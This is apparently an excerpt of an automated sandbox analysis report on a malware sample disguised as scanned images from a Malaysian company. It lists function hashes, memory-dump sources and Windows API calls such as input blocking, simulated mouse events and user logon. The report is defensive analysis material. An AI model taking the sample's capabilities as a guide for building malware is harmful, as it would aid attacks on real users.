                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 280f1ed997234b952649a9aa20c09c3b3002bda39a032a0ee4ce1020b20028a5
                                                        • Instruction ID: c1342b5109a85b31bac6fcd3f63a1dc0df92655c397672652a0ca06decb4f512
                                                        • Opcode Fuzzy Hash: 280f1ed997234b952649a9aa20c09c3b3002bda39a032a0ee4ce1020b20028a5
                                                        • Instruction Fuzzy Hash: 2CB0923105420AAFCF046BD1EC59B883F68EB46AA2F404020F61D880A0CBA354528AA1
                                                        Function 00A4F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46b26d64afd41da39374a35bb69675ba4c8f8f3c2366f956e8bb31b8feb58fdb
                                                        • Instruction ID: 1291c5082e1b4026fa144ce01cafbfd1c2c64478000db59d13399bbf6904d0f0
                                                        • Opcode Fuzzy Hash: 46b26d64afd41da39374a35bb69675ba4c8f8f3c2366f956e8bb31b8feb58fdb
                                                        • Instruction Fuzzy Hash: 68320526D69F414DDB239635D872339A289EFF73C4F15E737E81AB59A6EB28C4834100
                                                        Function 00A5267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 662808191709e77147ac6343e36fe2057b9e5dab1143d11a81a4c8325b164c22
                                                        • Instruction ID: 03192f3cae361feaeb8b5f3af00820d6000ed6f66e81bbad6857bd01699d3e0e
                                                        • Opcode Fuzzy Hash: 662808191709e77147ac6343e36fe2057b9e5dab1143d11a81a4c8325b164c22
                                                        • Instruction Fuzzy Hash: 0EB1EF21E2AF414DD72396798831336BA9CAFBB2D5F52D71BFC2674D32EB2185834241
                                                        Function 00A88B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __time64.LIBCMT ref: 00A88B25
                                                          • Part of subcall function 00A4543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00A891F8,00000000,?,?,?,?,00A893A9,00000000,?), ref: 00A45443
                                                          • Part of subcall function 00A4543A: __aulldiv.LIBCMT ref: 00A45463
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                        • String ID:
                                                        • API String ID: 2893107130-0
                                                        • Opcode ID: 0e6b6ee58669afbb54142d751e1e074a3481264e4c028e15ed0d755ed776e15f
                                                        • Instruction ID: c19b2fb4b93d79c9502c24ea6a9c2429b284608b164070c81d84802c2bb0a2ea
                                                        • Opcode Fuzzy Hash: 0e6b6ee58669afbb54142d751e1e074a3481264e4c028e15ed0d755ed776e15f
                                                        • Instruction Fuzzy Hash: 5321E4726356108BC729CF65D441A56B3E1EFA4311B688E6CD0E5CF2D0CE34BD05CB94
                                                        Function 00A941FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • BlockInput.USER32(00000001), ref: 00A94218
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BlockInput
                                                        • String ID:
                                                        • API String ID: 3456056419-0
                                                        • Opcode ID: e70cbfe418dc99d5b8290d4176cbff612c4e454c58d63def63a9e436522dd338
                                                        • Instruction ID: 4922ba540b2be473bf80aa60e75ac118a7a4c5c3fdb49b37c3434b62da05f9a8
                                                        • Opcode Fuzzy Hash: e70cbfe418dc99d5b8290d4176cbff612c4e454c58d63def63a9e436522dd338
                                                        • Instruction Fuzzy Hash: EEE04F313402149FDB10EF99E945E9BF7E8AF9C7A0F008026FC49C7352DA70E8428BA0
                                                        Function 00A84EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00A84F18
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: mouse_event
                                                        • String ID:
                                                        • API String ID: 2434400541-0
                                                        • Opcode ID: 28d35b3bdcbe352593286fca90f2b6fb228b57720b41fe9375f3908c69922a7d
                                                        • Instruction ID: 0260d5dcaf161f08a9a6af5d7dca6321e7254deb4f17a1bd4f3e1b680d9ff51f
                                                        • Opcode Fuzzy Hash: 28d35b3bdcbe352593286fca90f2b6fb228b57720b41fe9375f3908c69922a7d
                                                        • Instruction Fuzzy Hash: A4D05EB09642073CFC1CAB20AC0FF761508F348F81F84498D3341854C1AAE56C00A234
                                                        Function 00A78C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00A788D1), ref: 00A78CB3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: LogonUser
                                                        • String ID:
                                                        • API String ID: 1244722697-0
                                                        • Opcode ID: 787855316126020814b36a92e220d58eada5678095b6c87626c3034ace89dc28
                                                        • Instruction ID: b19d34434eacfb981d5c189e14508026925557468d155c58e45616d4e152cc9a
                                                        • Opcode Fuzzy Hash: 787855316126020814b36a92e220d58eada5678095b6c87626c3034ace89dc28
                                                        • Instruction Fuzzy Hash: D7D05E322A050EAFEF018EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                        Function 00A62230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00A62242
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID:
                                                        • API String ID: 2645101109-0
                                                        • Opcode ID: d02d6873bd4fa918335dfda4092cca06a529c4461b44101b8e631895ffa15787
                                                        • Instruction ID: 5acac4a741cad3b1be94b18caa286d3f9f66d218425346107f16f70a9eca9b06
                                                        • Opcode Fuzzy Hash: d02d6873bd4fa918335dfda4092cca06a529c4461b44101b8e631895ffa15787
                                                        • Instruction Fuzzy Hash: D9C048F180010ADBDB09DBE0DA88DEEBBBCEB08305F2440A6A142F2140E7749B448A71
                                                        Function 00A4A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00A4A36A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 3e1072d3e39af04c748b74a5bffb54f6644bc78c03312e292b0895f86763f4ce
                                                        • Instruction ID: 9706c4beb908137a175dbf5c2b711b021811e2829ba81865825431af36df7d92
                                                        • Opcode Fuzzy Hash: 3e1072d3e39af04c748b74a5bffb54f6644bc78c03312e292b0895f86763f4ce
                                                        • Instruction Fuzzy Hash: 2DA0123000010DAB8F001BC1EC044447F5CD6011907004020F40C44021873354114590
                                                        Function 00A38A0E Relevance: .6, Instructions: 608COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ef708563ec82045b0efe5a73fe7cfbd38a456da886bbb9b4243e8f29a7be306
                                                        • Instruction ID: 79aa017de3ca7e553a20aa772698a769b52a0efb362b02585e44ed42ca238ec3
                                                        • Opcode Fuzzy Hash: 9ef708563ec82045b0efe5a73fe7cfbd38a456da886bbb9b4243e8f29a7be306
                                                        • Instruction Fuzzy Hash: 7422E630A057168BDF288F64C89467DB7B1FB01344F68C46AF44A8B691EB7C9D82DB61
                                                        Function 00A42405 Relevance: .3, Instructions: 345COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction ID: ded012d215a079753d9343d0eda1ed043823c9471357a5c7c721ca5ffd8aed10
                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction Fuzzy Hash: 3EC1813A20509349EB2D4739943423EBAE16BE27B139A075EF4B2CB5C4FF20D569D720
                                                        Function 00A4283A Relevance: .3, Instructions: 341COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction ID: 8a885dbf6104c3f496ceb57f4a5943b4f9c881810611618be1226b25af6e9783
                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction Fuzzy Hash: 09C1A43A20519349EB2D4739843413EBBE16BD27B139A076EF4B2CB4C5FF20D5699720
                                                        Function 00A41BB8 Relevance: .3, Instructions: 323COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction ID: 201d4154fbd423f2baa97fd6ab3615733bc285951cdfdf6efd87073110200862
                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction Fuzzy Hash: 8DC1A43A24515349EF2D4739847403EBBE16BE27B135A075EE4B2CB4C4FF10D5AAD610
                                                        Function 00AAA849 Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 274COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 00AAA89F
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00AAA8D0
                                                        • GetSysColor.USER32(0000000F), ref: 00AAA8DC
                                                        • SetBkColor.GDI32(?,000000FF), ref: 00AAA8F6
                                                        • SelectObject.GDI32(?,?), ref: 00AAA905
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00AAA930
                                                        • GetSysColor.USER32(00000010), ref: 00AAA938
                                                        • CreateSolidBrush.GDI32(00000000), ref: 00AAA93F
                                                        • FrameRect.USER32(?,?,00000000), ref: 00AAA94E
                                                        • DeleteObject.GDI32(00000000), ref: 00AAA955
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00AAA9A0
                                                        • FillRect.USER32(?,?,?), ref: 00AAA9D2
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AAA9FD
                                                          • Part of subcall function 00AAAB60: GetSysColor.USER32(00000012), ref: 00AAAB99
                                                          • Part of subcall function 00AAAB60: SetTextColor.GDI32(?,?), ref: 00AAAB9D
                                                          • Part of subcall function 00AAAB60: GetSysColorBrush.USER32(0000000F), ref: 00AAABB3
                                                          • Part of subcall function 00AAAB60: GetSysColor.USER32(0000000F), ref: 00AAABBE
                                                          • Part of subcall function 00AAAB60: GetSysColor.USER32(00000011), ref: 00AAABDB
                                                          • Part of subcall function 00AAAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AAABE9
                                                          • Part of subcall function 00AAAB60: SelectObject.GDI32(?,00000000), ref: 00AAABFA
                                                          • Part of subcall function 00AAAB60: SetBkColor.GDI32(?,00000000), ref: 00AAAC03
                                                          • Part of subcall function 00AAAB60: SelectObject.GDI32(?,?), ref: 00AAAC10
                                                          • Part of subcall function 00AAAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00AAAC2F
                                                          • Part of subcall function 00AAAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AAAC46
                                                          • Part of subcall function 00AAAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00AAAC5B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                        • String ID: @U=u
                                                        • API String ID: 4124339563-2594219639
                                                        • Opcode ID: c817b5917cce47a9bd24c64c5f467a64a486ed099b7a50d78578d3e9840f079c
                                                        • Instruction ID: f6bba933613e329dec8ee56a30a41a3da01c4a7394956cd8091122db8082bf70
                                                        • Opcode Fuzzy Hash: c817b5917cce47a9bd24c64c5f467a64a486ed099b7a50d78578d3e9840f079c
                                                        • Instruction Fuzzy Hash: 88A18072408302AFD715DFA4DC08A6B7BE9FF8A321F104B29F962961E0D735D946CB52
                                                        Function 00AA37F3 Relevance: 52.9, APIs: 6, Strings: 24, Instructions: 365windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,00AAF910), ref: 00AA38AF
                                                        • IsWindowVisible.USER32(?), ref: 00AA38D3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpperVisibleWindow
                                                        • String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                        • API String ID: 4105515805-3469695742
                                                        • Opcode ID: e986339b108aa6332bbe3829d97a20e031ea151163e44850a1b0bcd7a1326566
                                                        • Instruction ID: 6cc6e1f9ac64c4f3d1131ad3cd50606768580d35edfd04b30756227cf8165843
                                                        • Opcode Fuzzy Hash: e986339b108aa6332bbe3829d97a20e031ea151163e44850a1b0bcd7a1326566
                                                        • Instruction Fuzzy Hash: 82D19E35204315DFCF14EF14CA51E6AB7A2AF95754F10886DB8865B3E2CB31EE0ACB91
                                                        Function 00A22C18 Relevance: 51.2, APIs: 27, Strings: 2, Instructions: 486windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?), ref: 00A22CA2
                                                        • DeleteObject.GDI32(00000000), ref: 00A22CE8
                                                        • DeleteObject.GDI32(00000000), ref: 00A22CF3
                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 00A22CFE
                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00A22D09
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00A5C68B
                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A5C6C4
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A5CAED
                                                          • Part of subcall function 00A21B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A22036,?,00000000,?,?,?,?,00A216CB,00000000,?), ref: 00A21B9A
                                                        • SendMessageW.USER32(?,00001053), ref: 00A5CB2A
                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A5CB41
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A5CB57
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A5CB62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                        • String ID: 0$@U=u
                                                        • API String ID: 464785882-975001249
                                                        • Opcode ID: 22318e0ae65c6aabbf7b9bcba91b827d5470117cbc6ab060a0deb6e940e33db7
                                                        • Instruction ID: 5dd390fbde5ce29ec07c33188f6ce90512071db17af957d6c9977e0745b093a4
                                                        • Opcode Fuzzy Hash: 22318e0ae65c6aabbf7b9bcba91b827d5470117cbc6ab060a0deb6e940e33db7
                                                        • Instruction Fuzzy Hash: 4E12BD30604212EFCB24CF28D984BA9BBE1BF09321F544579F985DB666C731EC46CB91
                                                        Function 00A977BE Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 284windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 00A977F1
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A978B0
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00A978EE
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00A97900
                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00A97946
                                                        • GetClientRect.USER32(00000000,?), ref: 00A97952
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00A97996
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A979A5
                                                        • GetStockObject.GDI32(00000011), ref: 00A979B5
